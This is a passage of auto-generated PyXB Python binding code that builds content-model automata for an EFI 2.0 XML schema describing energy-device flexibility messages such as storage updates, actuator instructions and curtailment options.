st_3._set_transitionSet(transitions)
transitions = []
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_23._Automaton = _BuildAutomaton_63()
CTD_ANON_24._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities'), SupportedCommodities, scope=CTD_ANON_24, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 345, 6)))
def _BuildAutomaton_64 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_64
del _BuildAutomaton_64
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5))
counters.add(cc_0)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_24._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_24._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionProcessingDelay')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 46, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_24._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'deviceDescription')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 47, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_24._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'currency')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_24._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 345, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_24._Automaton = _BuildAutomaton_64()
CTD_ANON_25._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'endBefore'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON_25, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 380, 6)))
CTD_ANON_25._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfiles'), SequentialProfiles, scope=CTD_ANON_25, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 381, 6)))
def _BuildAutomaton_65 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_65
del _BuildAutomaton_65
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_25._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_25._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_25._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_25._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'endBefore')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 380, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_25._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfiles')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 381, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
]))
st_3._set_transitionSet(transitions)
transitions = []
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_25._Automaton = _BuildAutomaton_65()
CTD_ANON_26._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileInstructions'), SequentialProfileInstructions, scope=CTD_ANON_26, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 404, 6)))
def _BuildAutomaton_66 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_66
del _BuildAutomaton_66
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_26._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_26._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 67, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_26._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 68, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_26._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'isEmergencyInstruction')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 69, 5))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_26._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileInstructions')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 404, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
]))
st_3._set_transitionSet(transitions)
transitions = []
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_26._Automaton = _BuildAutomaton_66()
CTD_ANON_27._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'fillLevelLabel'), pyxb.binding.datatypes.string, scope=CTD_ANON_27, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 415, 6)))
CTD_ANON_27._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'fillLevelUnit'), pyxb.binding.datatypes.string, scope=CTD_ANON_27, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 416, 6)))
CTD_ANON_27._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuators'), Actuators, scope=CTD_ANON_27, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 417, 6)))
def _BuildAutomaton_67 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_67
del _BuildAutomaton_67
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5))
counters.add(cc_0)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_27._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_27._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionProcessingDelay')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 46, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_27._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'deviceDescription')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 47, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_27._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'currency')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_27._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'fillLevelLabel')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 415, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_27._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'fillLevelUnit')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 416, 6))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_27._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'actuators')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 417, 6))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
]))
st_5._set_transitionSet(transitions)
transitions = []
st_6._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_27._Automaton = _BuildAutomaton_67()
def _BuildAutomaton_68 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_68
del _BuildAutomaton_68
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(StorageUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(StorageUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
symbol = pyxb.binding.content.ElementUse(StorageUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
StorageUpdate._Automaton = _BuildAutomaton_68()
CTD_ANON_28._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuatorInstructions'), ActuatorInstructions, scope=CTD_ANON_28, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 807, 6)))
def _BuildAutomaton_69 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_69
del _BuildAutomaton_69
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_28._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_28._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 67, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_28._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 68, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_28._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'isEmergencyInstruction')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 69, 5))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_28._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'actuatorInstructions')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 807, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
]))
st_3._set_transitionSet(transitions)
transitions = []
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_28._Automaton = _BuildAutomaton_69()
CTD_ANON_29._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities'), SupportedCommodities, scope=CTD_ANON_29, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 818, 6)))
def _BuildAutomaton_70 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_70
del _BuildAutomaton_70
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5))
counters.add(cc_0)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionProcessingDelay')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 46, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'deviceDescription')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 47, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'currency')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 818, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_29._Automaton = _BuildAutomaton_70()
def _BuildAutomaton_71 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_71
del _BuildAutomaton_71
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(AdjustableUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(AdjustableUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
symbol = pyxb.binding.content.ElementUse(AdjustableUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
AdjustableUpdate._Automaton = _BuildAutomaton_71()
CTD_ANON_30._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModeId'), pyxb.binding.datatypes.int, scope=CTD_ANON_30, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 923, 6)))
CTD_ANON_30._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), STD_ANON_3, scope=CTD_ANON_30, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 924, 6)))
CTD_ANON_30._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'startTime'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON_30, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 932, 6)))
def _BuildAutomaton_72 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_72
del _BuildAutomaton_72
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 924, 6))
counters.add(cc_0)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 67, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 68, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'isEmergencyInstruction')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 69, 5))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningModeId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 923, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 924, 6))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'startTime')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 932, 6))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
]))
transitions.append(fac.Transition(st_6, [
]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
st_6._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_30._Automaton = _BuildAutomaton_72()
CTD_ANON_31._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'forecastProfiles'), ProfileContainer, scope=CTD_ANON_31, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 285, 6)))
def _BuildAutomaton_73 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_73
del _BuildAutomaton_73
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_31._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_31._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_31._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_31._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'forecastProfiles')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 285, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_31._Automaton = _BuildAutomaton_73()
CTD_ANON_32._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'curtailmentOptions'), CurtailmentOptions, scope=CTD_ANON_32, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 312, 6)))
def _BuildAutomaton_74 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_74
del _BuildAutomaton_74
